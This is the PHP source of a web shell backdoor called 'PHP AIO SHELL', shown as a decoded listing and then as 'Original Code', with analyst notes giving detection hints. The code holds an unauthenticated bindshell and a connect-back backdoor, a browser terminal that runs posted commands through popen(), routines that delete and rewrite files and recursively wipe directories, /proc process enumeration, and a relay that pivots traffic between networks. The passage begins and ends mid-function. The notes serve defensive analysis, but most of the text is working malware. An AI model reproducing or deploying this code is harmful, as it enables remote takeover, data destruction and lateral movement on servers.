 * line, then loops forever reading up to 1024 bytes and executing them via
 * linux_exec(). No authentication of the client is performed. The cleanup
 * and `return 0` after the infinite loop cannot be reached. Returns -1 on
 * socket setup or banner-write failure.
 *
 * Analyst note: observable as a new listening port owned by the web server
 * account; the banner text is a fixed string in this sample. Inbound
 * filtering that only admits the HTTP(S) ports to the web tier blocks use of
 * the listener.
 */
function bindshell($local_port)
{
$banner = "bindshell from phpshell
";
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket == false) {
echo "create socket error.
";
return -1;
}
if (socket_bind($socket, '0', $local_port) == false) {
echo "bind sock error.
";
socket_close($socket);
return -1;
}
if (socket_listen($socket) == false) {
echo "listen sock error.
";
socket_close($socket);
return -1;
}
echo "listen on port $local_port ok.
";
while (true) {
if (($newsock = socket_accept($socket)) !== false) {
socket_getpeername($newsock, $ip);
echo "got a client form $ip"."<br />";
break;
}
}
$ret = socket_write($newsock, $banner, strlen($banner));
if ($ret == false) {
echo "write data failed.
";
socket_close($newsock);
socket_close($socket);
return -1;
}
while (true) {
$buf = socket_read($newsock, 1024);
echo $buf;
linux_exec($newsock, $buf);
}
socket_close($newsock);
socket_close($socket);
return 0;
}
/**
 * Web front end for the two command channels.
 *
 * Prints two forms, then:
 *  - if POST fields target_host and target_port are both truthy, calls
 *    connect_backdoor();
 *  - if POST field bind_port is truthy, calls bindshell().
 * The POST keys are read without isset(), and values are passed on unvalidated.
 *
 * Reached via `cmd=backdoor`.
 * Analyst note: the POST field names and the two page headings ("Linux
 * connect backdoor", "Linux bindshell backdoor") are fixed strings in this
 * sample. Because both callees loop forever, the HTTP request that triggers
 * them stays open until the PHP execution limit or the connection ends.
 */
function run_backdoor()
{
echo '<html><head><style>
h3.banner
{
text-align:center;
color:#384850;
font-weight:bold;
}
form
{
text-align:center;
}
input[type=text]
{
width:300px;
color:#384850;
background-color:#ffffff;
}
input[type=submit]
{
width:80px;
color:#384850;
background-color:#ffffff;
}
</head></style>
<h3 class="banner" >Linux connect backdoor</h3>
<form action="" method="post">
Target host
<input type="text" name="target_host" />
Target port
<input type="text" name="target_port" />
<input type="submit" value="Connect" />
</form>
</br />
<h3 class="banner" >Linux bindshell backdoor</h3>
<form action="" method="post">
Bind port
<input type="text" name="bind_port" />
<input type="submit" value="Bindshell" />
</form>
</html>';
if ($_POST['target_host'] && $_POST['target_port']) {
connect_backdoor($_POST['target_host'], $_POST['target_port']);
}
if ($_POST['bind_port']) {
bindshell($_POST['bind_port']);
}
}
/*
function exec_shell($cmd)
{
$handle = popen($cmd, "r");
while (($buf = fgets($handle, 1024)) != false) {
echo $buf;
}
pclose($handle);
return 0;
}
function run_shell()
{
$host_name = gethostbyaddr($_SERVER['SERVER_NAME']);
$uid = posix_getuid();
$user_info = posix_getpwuid($uid);
echo '<html>
<head>
<style>
input[type=text]
{
width:1130px;
color:#384850;
background-color:#ffffff;
}
textarea
{
width:1130px;
color:#384850;
background-color:#ffffff;
}
</style>
</head>
<body>
<form action="" method="post">
<font color="#384850">'.$user_info['name'].'@'.$host_name.'$</font>
<input style="border:none" color="#384850" type="text" name="shellcmd" />
<input style="border:none" color="#384850" type="submit" value="Execute" /><br /><br />
<textarea name="textarea" cols="150" rows="30" readonly>';
if ($_POST['shellcmd']) {
//echo $user_info['name'].'@'.$host_name.'$';
//echo $_POST['shellcmd'];
exec_shell($_POST['shellcmd']);
echo '</textarea></form></body></html>';
}
}
*/
/**
 * Run a command line through popen() and return its collected output.
 *
 * @cmd - string handed to popen() unchanged (aio_shell() passes
 *        $_POST['shellcmd']).
 *
 * $data is never initialised before the first `.=`, so the function returns
 * an undefined value (null) when the command produces no output.
 *
 * Analyst note: same host artefact as linux_exec() -- a shell child process
 * spawned by the web server / PHP worker.
 */
function run_terminal_shell($cmd)
{
$handle = popen($cmd, "r");
while (($buf = fgets($handle, 1024)) != false) {
$data .= $buf."";
}
pclose($handle);
return $data;
}
/**
 * Browser "terminal": executes the POST field `shellcmd` and shows the
 * accumulated output.
 *
 * A prompt string is built from the current account name, the result of
 * gethostbyaddr($_SERVER['SERVER_NAME']) and the working directory. When
 * `shellcmd` is truthy, the command is run through run_terminal_shell(), the
 * prompt, command and output are appended to $_SESSION['output'], and the
 * whole session transcript is echoed inside a <textarea> without escaping.
 * `shellcmd` is read without isset(). No authentication check is visible.
 *
 * Reached via `cmd=shell`.
 * Analyst note: fixed strings in this page include the POST field name
 * `shellcmd`, the "TERMINAL" heading and the footer line. Because the
 * transcript is kept in the PHP session, session storage on a compromised
 * host may retain the commands that were run and their output.
 */
function aio_shell()
{
$host_name = gethostbyaddr($_SERVER['SERVER_NAME']);
$uid = posix_getuid();
$user_info = posix_getpwuid($uid);
$curr_path = getcwd();
$prompt=$user_info['name'].'@'.$host_name.':'.$curr_path;
echo '<html>
<head>
<style>
tr.banner
{
font-size: 18px;
font-style:italic;
color:#ffffff;
background-color: #285070;
}
tr.prompt
{
font-size: 14px;
color:#285800;
background-color: #000000;
}
textarea {border: none; margin: 0px; padding: 2px 2px 2px; color: #285800; background-color: #000000;}
input
{
color: #285800; background-color: #000000;
}
</style>
<script type="text/javascript" language="JavaScript">
function init()
{
document.shell.output.scrollTop = document.shell.output.scrollHeight;
}
</script>
</head>
<body onload="init()">
<table align="center" border="0" width="600" cellpadding="0" cellspacing="0">
<tr class="banner">
<td width="10%"><b>TERMINAL</b></td>
<td align="center">'.$prompt.'</td>
</tr>
<form name="shell" action="" method="post">
<tr class="prompt">
<td colspan="2" nowrap>
<textarea name="output" rows="20" cols="90">';
if ($_POST['shellcmd']) {
$cmd_data = $prompt.'$'.$_POST['shellcmd']."
";
$cmd_data .= run_terminal_shell($_POST['shellcmd']);
$_SESSION['output'] .= $cmd_data;
echo $_SESSION['output'];
}
echo '</textarea><br />'.$prompt.'$'.'
<input style="border:none" type="text" name="shellcmd" />
<input style="border:none" type="submit" value="" />
</td>
</tr>
</form>
<tr class="banner">
<td align="center" height="20" colspan="2"> © wzt 2014 http://www.cloud-sec.org</td>
</tr>
</table>
</body>
</html>';
}
/**
 * Minimal dispatcher keyed on the `cmd` query parameter.
 *
 * Handles cmd=backdoor, shell, portscan and proxy; with no `cmd` it prints a
 * menu. The menu also links to cmd=showdir, for which no handler exists in
 * this function. No authentication check is performed before dispatch.
 *
 * This function is not called anywhere in this listing; the script's entry
 * point is aio_main().
 */
function webshell_main()
{
if (isset($_GET['cmd'])) {
if ($_GET['cmd'] == "backdoor") {
run_backdoor();
}
if ($_GET['cmd'] == "shell") {
aio_shell();
}
if ($_GET['cmd'] == "portscan") {
run_portscan();
}
if ($_GET['cmd'] == "proxy") {
web_proxy_client();
}
}
else {
echo '<html>
<body>
<table border="0" cellpadding="10" cellspacing="20">
<tr>
<td><a href="webshell.php?cmd=showdir">show directorys</a></td>
<td><a href="webshell.php?cmd=backdoor">connect backdoor</a></td>
<td><a href="webshell.php?cmd=portscan">port scan</a></td>
<td><a href="webshell.php?cmd=proxy">reverse proxy</a></td>
<td><a href="webshell.php?cmd=shell">cmd shell</a></td>
</tr>
</body>
</html>';
}
}
/**
 * Main page and request dispatcher of the web shell.
 *
 * On every request it first collects and prints host information: the
 * account PHP runs as (uid, gid, home, shell), uname fields, server name and
 * port, server time, server software, PHP and Zend versions, the
 * `disable_functions` setting, a safe-mode label, the working directory and
 * total/free disk space of "/". The safe-mode label is set to "On" when
 * ini_get('safe_mode') is false/empty, which looks inverted.
 *
 * It then dispatches on query parameters, with no authentication check
 * visible anywhere before dispatch:
 *  - cmd=dir | backdoor | shell | portscan | proxy -> the matching feature;
 *  - delete=<name> -> delete_file();
 *  - edit=<name>   -> edit_file().
 * The menu also links to cmd=crack and cmd=mysql, which have no handler in
 * this listing. $_GET keys are read without isset().
 *
 * Analyst note: fixed strings useful for content matching are the page
 * heading "PHP AIO SHELL" and the links to `webshell.php?cmd=...`. In access
 * logs, requests to one script carrying `cmd=`, `delete=` or `edit=`
 * parameters match this dispatcher. The `disable_functions` value shown in
 * the banner tells the operator which PHP functions are blocked; hardening
 * that list and removing the sockets/posix extensions where unused disables
 * most features of this sample.
 */
function aio_main()
{
$uid = posix_getuid();
$user_info = posix_getpwuid($uid);
$uid_banner="uid=".$uid."(".$user_info['name'].") ".
"gid=".$user_info['gid']."(".$user_info['name'].") ".
"dir=".$user_info['dir']." ".
"shell=".$user_info['shell'];
$uname = posix_uname();
$uname_banner=$uname['sysname']." ".$uname['nodename']." ".$uname['release']." ".
$uname['version']." ".$uname['machine'];
$server_addr=$_SERVER['SERVER_NAME'];
$server_port= $_SERVER['SERVER_PORT'];
$server_time=date("Y/m/d h:i:s",time());
$phpsoft=$_SERVER['SERVER_SOFTWARE'];
$php_version=PHP_VERSION;
$zend_version=zend_version();
$dis_func=get_cfg_var("disable_functions");
$safemode=@ini_get('safe_mode');
if ($safemode == false)
$safemode="On";
$cwd_path=getcwd();
$total_disk=disk_total_space("/");
$total_disk_gb=intval($total_disk/(1024*1024*1024));
$free_disk=disk_free_space("/");
$free_disk_gb=intval($free_disk/(1024*1024*1024));
echo '<html>
<head>
<style>
body
{
background-color:#FFFFFF;
}
ul.banner
{
list-style-type:none;
margin:0;
padding:0;
text-align:center;
color:#384850;
background-color:gray;
font-size:20px;
font-weight:bold;
}
ul.directory
{
font-size:14px;
text-align:left;
font-weight: bold;
}
li
{
display:inline;
}
a:link
{
color:#384850;
}
a:visited
{
color:#384850;
}
a:hover
{
color:#384850;
}
a:active
{
color:#384850;
}
h2.banner
{
text-align:center;
color:#384850;
font-weight:bold;
}
table.banner
{
font-size:14px;
}
tr.banner
{
font-size:16px;
color:#384850;
background-color:gray;
}
tr.directory
{
font-size:14px;
text-align:left;
height:20px;
border:1px solid #98bf21;
padding:2px 6px 2px 6px;
}
p.banner
{
font-size:14px;
}
</style>
</head>
<body>
<h2 class="banner">PHP AIO SHELL</h2>
<hr />
<table class="banner">
<tr>
<td width="1200" >User: '.$uid_banner.'</td>
<td width="200" align="center" >'.$server_time.'</td>
</tr>
<tr>
<td width="1200" >Uname: '.$uname_banner.'</td>
<td width="200" align="center" >'.$server_addr.":".$server_port.'</td>
</tr>
</table>
<hr />
<p class="banner">Software: '.$phpsoft.' | PHP: '.$php_version.' | ZEND: '.$zend_version.'
| Safemode: '.$safemode.' | disfunc: '.$dis_func.'
</p>
<table class="banner">
<tr>
<td width="200" align="left">Directroy: '.$cwd_path.'</td>
<td width="200" >Disk: total '.$total_disk_gb.'GB free '.$free_disk_gb.'GB </td>
</tr>
</table>
<br />
<ul class="banner">
<li><a href="webshell.php?cmd=dir">[Directorys]</a></li>
<li><a href="webshell.php?cmd=backdoor">[Backdoor]</a></li>
<li><a href="webshell.php?cmd=portscan">[PortScan]</a></li>
<li><a href="webshell.php?cmd=proxy">[Proxy]</a></li>
<li><a href="webshell.php?cmd=shell">[Shell]</a></li>
<li><a href="webshell.php?cmd=crack">[Crack]</a></li>
<li><a href="webshell.php?cmd=mysql">[Mysql]</a></li>
</ul>
<br />
</body>
</html>';
if ($_GET['cmd']) {
if ($_GET['cmd'] == "dir") {
aio_directory();
}
if ($_GET['cmd'] == "backdoor") {
run_backdoor();
}
if ($_GET['cmd'] == "shell") {
aio_shell();
}
if ($_GET['cmd'] == "portscan") {
run_portscan();
}
if ($_GET['cmd'] == "proxy") {
web_proxy_client();
}
}
if ($_GET['delete']) {
delete_file($_GET['delete']);
}
if ($_GET['edit']) {
edit_file($_GET['edit']);
}
}
// Entry point: aio_main() runs unconditionally on every request to this script.
aio_main();
?>
Original Code
<?php
// Opens a PHP session; the decoded listing on this page shows aio_shell()
// appending command output to $_SESSION['output'].
session_start();
// Report every PHP error level.
error_reporting(E_ALL);
/**
 * Echo a file's contents to the response, one fgets() chunk (up to 1023 bytes) at a time.
 *
 * @file_name - path handed directly to fopen(); nothing here validates or confines it.
 *
 * Returns 0 on success, -1 when fopen() fails. Output is echoed without HTML escaping.
 * The loop ends on a loose `!= false` test, so a chunk equal to "0" also stops it.
 */
function read_file($file_name)
{
$fp = fopen($file_name, "r");
if ($fp == false) {
echo "open $file_name failed.\n";
return -1;
}
while (($buf = fgets($fp, 1024)) != false ) {
echo $buf;
}
fclose($fp);
return 0;
}
/**
 * Copy a file chunk by chunk with fgets()/fwrite().
 *
 * @src_file - source path, opened read-only.
 * @dst_file - destination path, opened "w+" (created or truncated).
 *
 * Returns 0 on success, -1 on any open or write failure. A failed open of the
 * destination returns -1 without printing a message. Neither path is validated.
 */
function copy_file($src_file, $dst_file)
{
$src_fp = fopen($src_file, "r");
if ($src_fp == false) {
echo "open $src_file failed.\n";
return -1;
}
$dst_fp = fopen($dst_file, "w+");
if ($dst_fp == false) {
fclose($src_fp);
return -1;
}
while (($buf = fgets($src_fp, 1024)) != false) {
if (fwrite($dst_fp, $buf, strlen($buf)) == false) {
echo "fwrite failed.\n";
fclose($src_fp);
fclose($dst_fp);
return -1;
}
}
fclose($src_fp);
fclose($dst_fp);
return 0;
}
/**
 * Copy a file with PHP's built-in copy().
 *
 * @src_file - source path; must exist.
 * @dst_file - destination path.
 *
 * Returns 0 on success, -1 if the source is missing or copy() fails.
 * The failure message interpolates $src, which is never defined in this
 * function, so the source name is missing from that message.
 */
function copy_file_binary($src_file, $dst_file)
{
if (file_exists($src_file) == false) {
echo "file $src_file not exist.\n";
return -1;
}
if (copy($src_file, $dst_file) == false) {
echo "copy $src to $dst_file failed.\n";
return -1;
}
echo "copy $src_file to $dst_file ok.\n";
return 0;
}
/**
 * Delete a single file with unlink().
 *
 * @file_name - path to remove; used as given, with no allow-list or directory check.
 *
 * Returns 0 on success, -1 if the file is missing or unlink() fails.
 *
 * Analyst note: the decoded listing on this page shows aio_main() passing
 * $_GET['delete'] straight into this function, so any request carrying a
 * `delete=` parameter can remove files the web server account may write to.
 * The name is echoed back without HTML escaping.
 */
function delete_file($file_name)
{
if (file_exists($file_name) == false) {
echo "file $file_name not exist.";
return -1;
}
if (unlink($file_name) == false) {
echo "delete $file_name failed.";
return -1;
}
echo "delete $file_name ok.\n";
return 0;
}
/**
 * Show or overwrite a file in the current working directory.
 *
 * @file_path - requested path; only its basename() is used, so the target is
 *              always resolved relative to the script's working directory.
 *
 * Without a non-empty POST field `newcontent`, the file is read and printed
 * inside a <textarea> (no HTML escaping). With it, the file is opened "w+"
 * and replaced by the POST body. All file calls are silenced with `@`.
 *
 * Analyst note: the decoded listing on this page shows aio_main() calling
 * this with $_GET['edit'], so a single request can rewrite any writable file
 * next to the script, including other PHP files. Unexpected modification
 * times on files in the web root are a useful integrity signal.
 */
function edit_file($file_path)
{
$file_name = basename($file_path);
if (empty($_POST['newcontent'])) {
echo '<form action="" method="post">';
$fp=@fopen($file_name, "r");
$data=@fread($fp, filesize($file_name));
echo '<textarea name="newcontent" cols="80" rows="20" >';
echo $data;
@fclose($fp);
echo '</textarea>
<input type="submit" value="Edit"/>
</form>';
}
else {
$fp=@fopen($file_name, "w+");
$result=@fwrite($fp, $_POST['newcontent']);
@fclose($fp);
if ($result == false) {
echo "edit failed.";
}
else {
echo "edit ok.";
}
}
}
/**
 * Rename (or move) a file with rename().
 *
 * @old_file_name - existing path; must exist.
 * @new_file_name - new path.
 *
 * Returns 0 on success, -1 if the source is missing or rename() fails.
 * Neither path is validated; both are echoed without HTML escaping.
 */
function rename_file($old_file_name, $new_file_name)
{
if (file_exists($old_file_name) == false) {
echo "file $old_file_name not exist.\n";
return -1;
}
if (rename($old_file_name, $new_file_name) == false) {
echo "rename $old_file_name to $new_file_name failed.\n";
return -1;
}
echo "rename $old_file_name to $new_file_name ok.\n";
return 0;
}
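/**
 * Convert a byte count into a short human-readable string.
 *
 * @bytes - size in bytes (int or float).
 *
 * Returns the value divided by 1024 per unit step, truncated to an integer,
 * followed by the unit name, e.g. "2 KB". Sizes of 1024 TB and above stay in
 * TB instead of indexing past the end of the unit table.
 */
function get_human_size($bytes)
{
    $type = array("Bytes", "KB", "MB", "GB", "TB");
    $last = count($type) - 1;
    $idx = 0;
    // Stop at the largest known unit so $type[$idx] is always defined.
    while ($bytes >= 1024 && $idx < $last) {
        $bytes /= 1024;
        $idx++;
    }
    return (intval($bytes)." ".$type[$idx]);
}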
/**
 * Return the last four octal digits of a file's mode, e.g. "0644".
 *
 * @file_name - path passed to fileperms().
 */
function get_file_perms($file_name)
{
    $octal_mode = sprintf('%o', fileperms($file_name));
    return substr($octal_mode, -4);
}
/**
 * Render a file's mode in `ls -l` form, e.g. "-rwxr-xr-x".
 *
 * @file_name - path passed to fileperms().
 *
 * The first character is the file type ('u' when no known type mask matches);
 * the remaining nine are the owner/group/other triplets, with s/S and t/T
 * marking the setuid, setgid and sticky bits.
 */
function get_human_file_perms($file_name)
{
    $perms = fileperms($file_name);

    // File-type masks, tested in this exact order; the first full match wins.
    $type_masks = array(
        0xC000 => 's',
        0xA000 => 'l',
        0x8000 => '-',
        0x6000 => 'b',
        0x4000 => 'd',
        0x2000 => 'c',
        0x1000 => 'p',
    );
    $info = 'u';
    foreach ($type_masks as $mask => $letter) {
        if (($perms & $mask) == $mask) {
            $info = $letter;
            break;
        }
    }

    // Per class: read bit, write bit, execute bit, special bit,
    // letter when special+execute are set, letter when only special is set.
    $classes = array(
        array(0x0100, 0x0080, 0x0040, 0x0800, 's', 'S'),
        array(0x0020, 0x0010, 0x0008, 0x0400, 's', 'S'),
        array(0x0004, 0x0002, 0x0001, 0x0200, 't', 'T'),
    );
    foreach ($classes as $c) {
        $info .= ($perms & $c[0]) ? 'r' : '-';
        $info .= ($perms & $c[1]) ? 'w' : '-';
        if ($perms & $c[2]) {
            $info .= ($perms & $c[3]) ? $c[4] : 'x';
        } else {
            $info .= ($perms & $c[3]) ? $c[5] : '-';
        }
    }
    return $info;
}
/**
 * Return the account name of a file's owner.
 *
 * @file_name - path passed to fileowner(); the uid is resolved with posix_getpwuid().
 */
function get_file_owner($file_name)
{
    $owner_record = posix_getpwuid(fileowner($file_name));
    return $owner_record['name'];
}
/**
 * Print the path of every entry in a directory (non-recursive).
 *
 * @dir_path - directory to list; "." and ".." are skipped.
 *
 * Returns 0, or -1 when opendir() fails.
 * closedir($dp) sits outside the is_dir() branch, so it also runs with an
 * undefined $dp when @dir_path is not a directory.
 */
function read_dir($dir_path)
{
if (is_dir($dir_path)) {
if (($dp = opendir($dir_path)) == false) {
echo "open $dir_path failed.\n";
return -1;
}
while (($file_name = readdir($dp)) != false) {
if ($file_name == "." || $file_name == "..")
continue;
$sub_path = $dir_path."/".$file_name;
echo "$sub_path\n";
}
}
closedir($dp);
return 0;
}
/**
 * Render an HTML file-manager table for a directory.
 *
 * @dir_path - directory to list.
 *
 * Returns 0, or -1 when opendir() fails.
 *
 * Each row shows name, a timestamp, size, octal and symbolic mode and owner,
 * plus action links to `webshell.php` with `delete=`, `edit=`, `download=`
 * and `rename=` query parameters.
 *
 * Behaviour worth knowing when analysing output:
 *  - the stat calls use the bare $file_name, not $sub_path, so values are
 *    resolved relative to the current working directory;
 *  - the "Last modified" column is filled from fileatime(), i.e. access time;
 *  - file names are written into the HTML and the unquoted href without escaping.
 *
 * Analyst note: the hard-coded script name and these query parameter names
 * are what would appear in web access logs when the table's links are used.
 */
function read_dirs($dir_path)
{
echo '
<table>
<tr class="banner">
<td width="400" >Filename</td>
<td width="400" >Last modified</td>
<td width="400" >Size</td>
<td width="400" >Chmod/Perms</td>
<td width="400" >Action</td>
</tr>';
if (is_dir($dir_path)) {
if (($dp = opendir($dir_path)) == false) {
echo "open $dir_path failed.\n";
return -1;
}
while (($file_name = readdir($dp)) != false) {
if ($file_name == "." || $file_name == "..")
continue;
$sub_path = $dir_path."/".$file_name;
$last_modify_time=date("Y/m/d H:i:s", fileatime($file_name));
$file_size=filesize($file_name);
$file_size_string=get_human_size($file_size);
$file_perms=get_file_perms($file_name);
$file_perms_string=get_human_file_perms($file_name);
$file_owner=get_file_owner($file_name);
echo '<tr class="directory">
<td width="400" ><a href='.$file_name.'>'.$file_name.'</a></td>
<td width="400" >'.$last_modify_time.'</td>
<td width="400" >'.$file_size_string.'</td>
<td width="400" >'.$file_perms.' / '.$file_perms_string.' / '.$file_owner.'</td>
<td width="400" ><a href="webshell.php?delete='.$file_name.'"'.'>Delete </a>
<a href="webshell.php?edit='.$file_name.'"'.'>Edit </a>
<a href="webshell.php?download='.$file_name.'"'.'>Download </a>
<a href="webshell.php?rename='.$file_name.'"'.'>Rename </a>
</td>
</tr>';
}
}
echo '</table>';
closedir($dp);
return 0;
}
/**
 * Render the file-manager table for the script's current working directory.
 *
 * Returns whatever read_dirs() returns.
 */
function aio_directory()
{
$curr_path=getcwd();
return read_dirs($curr_path);
}
/**
 * Recursively look for an entry with an exact name under a directory.
 *
 * @dir_path    - directory to start from.
 * @target_file - entry name compared with strcmp().
 *
 * Returns 0 when a match is found directly in @dir_path, otherwise -1.
 * The return value of the recursive call is ignored, so a match found in a
 * subdirectory is only reported by the echoed "found" line, and a
 * "not found" line is printed for every directory without a direct match.
 */
function search_file_by_name($dir_path, $target_file)
{
if (is_dir($dir_path)) {
if (($dp = opendir($dir_path)) == false) {
echo "open $dir_path failed.\n";
return -1;
}
while (($file_name = readdir($dp)) != false) {
if ($file_name == "." || $file_name == "..")
continue;
$sub_path = $dir_path."/".$file_name;
if (is_dir($sub_path)) {
search_file_by_name($sub_path, $target_file);
}
if (!strcmp($file_name, $target_file)) {
echo "found $target_file.\n";
closedir($dp);
return 0;
}
}
echo "not found $target_file.\n";
closedir($dp);
}
return -1;
}
/**
* show files that have a certain attribute flag.
*
* @dir_path - directory to search.
* @attr_flag - 0 readable.
* - 1 writeable.
* - 2 executable.
*/
function show_attr_file($dir_path, $attr_flag)
{
if (is_dir($dir_path)) {
if (($dp = opendir($dir_path)) == false) {
echo "open $dir_path failed.\n";
return -1;
}
while (($file_name = readdir($dp)) != false) {
if ($file_name == "." || $file_name == "..")
continue;
$sub_path = $dir_path."/".$file_name;
if (is_dir($sub_path)) {
show_attr_file($sub_path, $attr_flag);
}
if ($attr_flag == 0) {
if (is_readable($file_name))
echo "$sub_path\n";
}
else if ($attr_flag == 1) {
if (is_writable($file_name))
echo "$sub_path\n";
}
else if ($attr_flag == 2) {
if (is_executable($file_name))
echo "$sub_path\n";
}
else {
echo "wrong attribute flag.\n";
break;
}
}
closedir($dp);
}
return 0;
}
/**
 * Create a directory with mode 0700 unless the path already exists.
 *
 * Analyst note: a directory created this way is owned by the web-server
 * account and closed to group/other (subject to umask), which is worth
 * checking for when triaging a compromised web root.
 *
 * @param string $dir_path Path to create.
 * @return int 0 on success, -1 if the path exists or mkdir() fails.
 */
function create_dir($dir_path)
{
// Existing path: fail silently, nothing is echoed.
if (file_exists($dir_path))
return -1;
if (mkdir($dir_path, 0700) == false) {
echo "create $dir_path failed.\n";
return -1;
}
echo "create $dir_path ok.\n";
return 0;
}
/**
 * Remove a single directory with rmdir().
 *
 * @param string $dir_path Directory to remove; rmdir() only succeeds on an empty one.
 * @return int 0 on success, -1 if the path does not exist or rmdir() fails.
 */
function destroy_dir($dir_path)
{
// Missing path: fail silently, nothing is echoed.
if (file_exists($dir_path) == false)
return -1;
if (rmdir($dir_path) == false) {
echo "delete $dir_path failed.\n";
return -1;
}
echo "delete $dir_path ok.\n";
return 0;
}
/**
 * Recursively delete a directory tree: files through delete_file(),
 * directories through destroy_dir() once their contents are gone.
 *
 * Analyst note: this gives the operator a bulk-wipe capability limited only by
 * the web-server account's filesystem permissions. Failures of the individual
 * delete calls are echoed by the helpers but not propagated.
 *
 * @param string $dir_path Root of the tree to delete.
 * @return int -1 if $dir_path cannot be opened; 0 otherwise, including when
 *             $dir_path is not a directory or individual deletions failed.
 */
function destroy_dirs($dir_path)
{
if (is_dir($dir_path)) {
if (($dp = opendir($dir_path)) == false) {
echo "open $dir_path failed.\n";
return -1;
}
while (($file_name = readdir($dp)) != false) {
if ($file_name == "." || $file_name == "..")
continue;
$sub_path = $dir_path."/".$file_name;
if (is_dir($sub_path)) {
destroy_dirs($sub_path);
}
else
delete_file($sub_path);
}
closedir($dp);
// Contents handled above; now remove the directory itself.
destroy_dir($dir_path);
return 0;
}
return 0;
}
/**
 * Echo an `id`-style summary (uid, gid, home directory, login shell) for the
 * account the PHP process runs as, using the POSIX extension.
 *
 * Analyst note: no child process is spawned, so process-creation telemetry
 * will not show this lookup. The name printed next to the gid is the user
 * name from the passwd entry, not a resolved group name.
 */
function linux_id()
{
$uid = posix_getuid();
$user_info = posix_getpwuid($uid);
echo "uid=".$uid."(".$user_info['name'].") ";
echo "gid=".$user_info['gid']."(".$user_info['name'].") ";
echo "dir=".$user_info['dir']." ";
echo "shell=".$user_info['shell']."\n";
}
/**
 * Echo the fields of posix_uname() (sysname, nodename, release, version,
 * machine) on one line, i.e. host and kernel fingerprinting without
 * executing an external command.
 */
function linux_uname()
{
$uname = posix_uname();
echo $uname['sysname']." ".$uname['nodename']." ".$uname['release']." ";
echo $uname['version']." ".$uname['machine'];
}
/**
 * Extract the value of the first line containing "Name:" from a file.
 *
 * linux_ps() calls this with /proc/<pid>/status to obtain the process name.
 *
 * @param string $file_name Path of the file to read.
 * @return string|int The second whitespace-separated token of the matching
 *                    line, 0 if no line matched, -1 if the file cannot be opened.
 */
function get_proc_name($file_name)
{
$fp = fopen($file_name, "r");
if ($fp == false) {
echo "open $file_name failed.\n";
return -1;
}
while (($buf = fgets($fp, 1024)) != false ) {
if (strstr($buf, "Name:") != NULL) {
// "%s %s": first token is the "Name:" label, second is the value.
sscanf($buf, "%s %s", $tmp, $name);
fclose($fp);
return $name;
}
}
fclose($fp);
return 0;
}
/**
 * Return the first line (at most 1023 bytes) of a file.
 *
 * linux_ps() calls this with /proc/<pid>/cmdline to obtain the command line.
 *
 * @param string $file_name Path of the file to read.
 * @return string|false|int The data read, false when nothing could be read,
 *                          or -1 if the file cannot be opened.
 */
function get_proc_cmd($file_name)
{
$fp = fopen($file_name, "r");
if ($fp == false) {
echo "open $file_name failed.\n";
return -1;
}
$cmd = fgets($fp, 1024);
fclose($fp);
return $cmd;
}
/**
 * Echo a process listing (pid, name, command line) by walking /proc.
 *
 * Analyst note: the listing comes from direct reads of /proc/<pid>/status and
 * /proc/<pid>/cmdline, so no `ps` child process appears in process-creation
 * logs. File-access auditing on /proc or restricting /proc visibility for the
 * web-server account are the relevant controls.
 *
 * @return int 0 on completion, -1 if /proc cannot be opened.
 */
function linux_ps()
{
if (($dp = opendir("/proc")) == false) {
echo "open /proc failed.\n";
return -1;
}
echo "open /proc ok.\n";
while (($file_name = readdir($dp)) != false) {
if ($file_name == "." || $file_name == "..")
continue;
// Only all-digit entries are treated as process directories.
if (ctype_digit($file_name) == false)
continue;
$dir_path = "/proc/$file_name/status";
$proc_name = get_proc_name($dir_path);
$dir_path = "/proc/$file_name/cmdline";
$proc_cmd = get_proc_cmd($dir_path);
echo $file_name."\t\t".$proc_name." ".$proc_cmd."\n";
}
closedir($dp);
return 0;
}
/**
 * Open a blocking IPv4 TCP connection with the sockets extension.
 *
 * Analyst note: this is the outbound primitive used by run_proxy_client() and
 * connect_backdoor(). Connection warnings are suppressed with `@`, so a failed
 * attempt leaves no PHP warning behind.
 *
 * @param string     $host Destination address.
 * @param int|string $port Destination port.
 * @return mixed The connected socket, or -1 on failure.
 */
function tcp_connect($host, $port)
{
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket == false) {
echo "create socket error.\n";
return -1;
}
if (@socket_connect($socket, $host, $port) == false) {
socket_close($socket);
return -1;
}
return $socket;
}
/**
 * Open an IPv4 TCP connection on a non-blocking socket, retrying once per
 * second until it succeeds or $timeout seconds have elapsed.
 *
 * @param string     $host    Destination address.
 * @param int|string $port    Destination port.
 * @param int        $timeout Maximum number of seconds to keep retrying.
 * @return mixed The connected socket (left in non-blocking mode), or -1 on
 *               failure or timeout.
 */
function tcp_connect_timeout($host, $port, $timeout)
{
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket == false) {
echo "create socket error.\n";
return -1;
}
if (socket_set_nonblock($socket) == false) {
echo "set nonblock error.\n";
socket_close($socket);
return -1;
}
$time = time();
while (!@socket_connect($socket, $host, $port)) {
$err = socket_last_error($socket);
// 115 and 114 are the Linux errno values EINPROGRESS and EALREADY:
// the connect is still pending, so wait and retry until the deadline.
if ($err == 115 || $err == 114) {
if ((time() - $time) >= $timeout) {
socket_close($socket);
echo "socket timeout.\n";
return -1;
}
sleep(1);
continue;
}
// Any other error is treated as a hard failure.
socket_close($socket);
return -1;
}
echo "connect to $host:$port ok.\n";
return $socket;
}
/**
 * Connect outbound to two endpoints and relay traffic between them.
 *
 * Analyst note: both legs are initiated from the web server, so the host acts
 * as a pivot between the two endpoints. web_proxy_client() labels them
 * "intranet" and "public". Egress filtering on the web tier and alerting on
 * web-server processes that open arbitrary outbound TCP sessions are the
 * relevant controls.
 *
 * @param string     $remote_host1 First endpoint address.
 * @param int|string $remote_port1 First endpoint port.
 * @param string     $remote_host2 Second endpoint address.
 * @param int|string $remote_port2 Second endpoint port.
 * @return int 0 once the relay loop ends, -1 if either connection fails.
 */
function run_proxy_client($remote_host1, $remote_port1, $remote_host2, $remote_port2)
{
$socket1 = tcp_connect($remote_host1, $remote_port1);
if ($socket1 == -1) {
echo "connect to $remote_host1:$remote_port1 failed.\n";
return -1;
}
echo "connect to $remote_host1:$remote_port1 ok.\n";
$socket2 = tcp_connect($remote_host2, $remote_port2);
if ($socket2 == -1) {
echo "connect to $remote_host2:$remote_port2 failed.\n";
socket_close($socket1);
return -1;
}
echo "connect to $remote_host2:$remote_port2 ok.\n";
// run_proxy_core() closes both sockets when the relay ends.
run_proxy_core($socket1, $remote_host1, $socket2, $remote_host2);
